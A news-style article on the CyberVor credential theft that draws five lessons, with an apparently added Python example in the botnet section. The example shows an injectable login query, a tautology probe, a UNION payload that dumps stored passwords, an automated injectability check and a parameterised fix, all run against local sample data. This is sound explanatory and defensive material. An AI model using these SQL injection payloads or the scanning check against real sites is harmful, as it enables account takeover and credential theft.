The "CyberVor" cache might well be the biggest archive of login details ever obtained by one group of hackers.
Hold Security spent some seven months tracking the Russian cyber gang responsible; by then the hackers had amassed 4.5 billion records, of which 1.2 billion username and password pairs are believed to be unique.
Whether or not a company has been affected, there is much to learn from the breach, so here are the best responses from the security community.
1) It may be time for legislation about breach notification
Amid some controversy, Hold is planning to charge websites before telling them whether they were affected by the breach. Those who want to know will have to sign up to the firm’s breach notification service, at a cost of $120 (£71) a year. Unsurprisingly, some have condemned this as cynical, while others call for better regulation.
"An interesting feature of the attack having been uncovered by an independent security firm is the unstructured process by which news of which businesses have been hacked reaches those organisations," said James Mullock, partner at law firm Osborne Clarke. "There is currently little legislative guidance regulating how that process should operate and it appears ripe for review."
2) Passwords are still broken
We know you’re bored of being told how useless passwords are, but it is still as true today as it was yesterday. Hold even found the same email and password pairs used across different sites, which is exactly the sin security experts are always reprimanding us for: once one site leaks the pair, every other site where it is reused falls with it.
"It’s too easy to reuse passwords across countless websites or create easy-to-guess passwords," said Laura O’Brien, technical narrator at security firm Symantec. "As a result, if an attacker manages to gain access to the user’s login credentials by breaching a website, they could potentially use the details to gain unauthorised access to several other online accounts."
The future of security may involve two-factor authentication or even biometrics, but for now users are advised to use a strong and different password for every site, and to consider a password manager – though these are not without their problems.
3) Hackers bought some of the data
The modern depiction of a hacker is not that far removed from the nerd of yesteryear, albeit a bit moodier, and more inclined to wear hoodies. Yet increasingly we are hearing reports of hackers as businessmen, buying stolen data from other groups and selling their own wares as a product or service.
"It appears the biggest compilation of stolen credentials in the world wasn’t created through a master hacking operation, but rather the conglomeration of disparate hacking groups," said Gary Davis, vice president of global consumer marketing at McAfee.
"And that’s the thing you need to know about professional hackers: they aren’t the James Bond-esque adventurers depicted in the movies, but rather people who operate through trial and error and spreadsheets."
4) …but they also used a botnet
Many of the big security stories this year have involved botnets, networks of victims’ computers that are unwittingly roped into sending spam, distributing malware or scanning other systems. In this case a botnet was used to probe websites for SQL injection vulnerabilities, finding more than 400,000 vulnerable sites, which were then attacked so the hackers could pull credentials out of their databases.
"A large proportion of all the malware families that we see form some sort of botnet," said James Wyke, senior threat researcher at security firm Sophos. "In fact there are relatively few categories of malware that don’t. Even those that don’t are often spread through botnets – CryptoLocker was spread via the Gameover Zeus botnet for example."
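The scanning described above comes down to sending every site a canned probe and seeing whether the response changes shape. The following is an added example, not code from the article or from Hold Security’s report, showing the vulnerable login query a scanner is looking for, the probe that identifies it, the follow-up query that drains the table, and the parameterised version that defeats all of it. The `users` rows are constructed sample data and the function names are this example’s own.

```python
import sqlite3

# Constructed sample data standing in for one of the 400,000 sites' user tables.
# Real sites should never store plaintext passwords; this is the worst case.
SAMPLE_USERS = [
    ("alice@example.com", "s3cret-alice"),
    ("bob@example.com", "hunter2"),
    ("carol@example.com", "correcthorse"),
]


def make_db():
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, email, password):
    """The pattern scanners hunt for: user input spliced straight into SQL."""
    sql = ("SELECT email FROM users WHERE email = '%s' AND password = '%s'"
           % (email, password))
    return [row[0] for row in conn.execute(sql)]


def login_hardened(conn, email, password):
    """Same query with bound parameters: input is data, never SQL."""
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (email, password))]


# Step 1: the identification probe. Injected into both fields it turns the
# WHERE clause into  email='' OR '1'='1' AND password='' OR '1'='1', which
# is true for every row, so a vulnerable site answers with all its users.
TAUTOLOGY_PROBE = "' OR '1'='1"

# Step 2: the data-theft payload. UNION glues a second SELECT onto the
# original, and the trailing -- comments out the rest of the query.
UNION_DUMP = "x' UNION SELECT password FROM users --"


def is_injectable(login_fn, conn):
    """Automated check: a correct login function never matches an empty
    tautology probe, so any rows back means the query is injectable."""
    return len(login_fn(conn, TAUTOLOGY_PROBE, TAUTOLOGY_PROBE)) > 0


def dump_passwords(login_fn, conn):
    """Use the UNION payload to read every password through the login form."""
    return login_fn(conn, UNION_DUMP, "irrelevant")


def demo():
    """Return (legit login, probe result, probe against hardened query)."""
    conn = make_db()
    legit = login_vulnerable(conn, "alice@example.com", "s3cret-alice")
    probed = login_vulnerable(conn, TAUTOLOGY_PROBE, TAUTOLOGY_PROBE)
    hardened = login_hardened(conn, TAUTOLOGY_PROBE, TAUTOLOGY_PROBE)
    return legit, probed, hardened


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable injectable:", is_injectable(login_vulnerable, conn))
    print("hardened injectable:  ", is_injectable(login_hardened, conn))
    print("dumped via UNION:     ", dump_passwords(login_vulnerable, conn))
```

The point of `is_injectable` is that it needs no knowledge of the site: the same two-string probe works against any login form built the vulnerable way, which is exactly the kind of mindless, repeatable test that scales across a botnet. Against the parameterised query the probe is just a strange email address, and `dump_passwords` returns nothing because the `UNION` and `--` are quoted as literal characters rather than parsed as SQL.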
5) It’s no time to panic
It is easy to become jaded by the seemingly constant stream of big cyber attacks in the news these days. But some argue that this particular attack is overblown, and that until affected sites are named there is no immediate need for people to hastily change all their passwords.
"While this sounds like a credentials disaster of the worst kind, the fact remains that we have yet to see any hard details on the various breaches – and currently no companies have come forward and admitted being affected," said Chris Boyd, malware intelligence analyst at Malwarebytes.
"If this attack really is this wide-reaching, then surely some of this information will come out in the wash eventually – with 1.2 billion passwords supposedly taken, it would be impossible for it not to."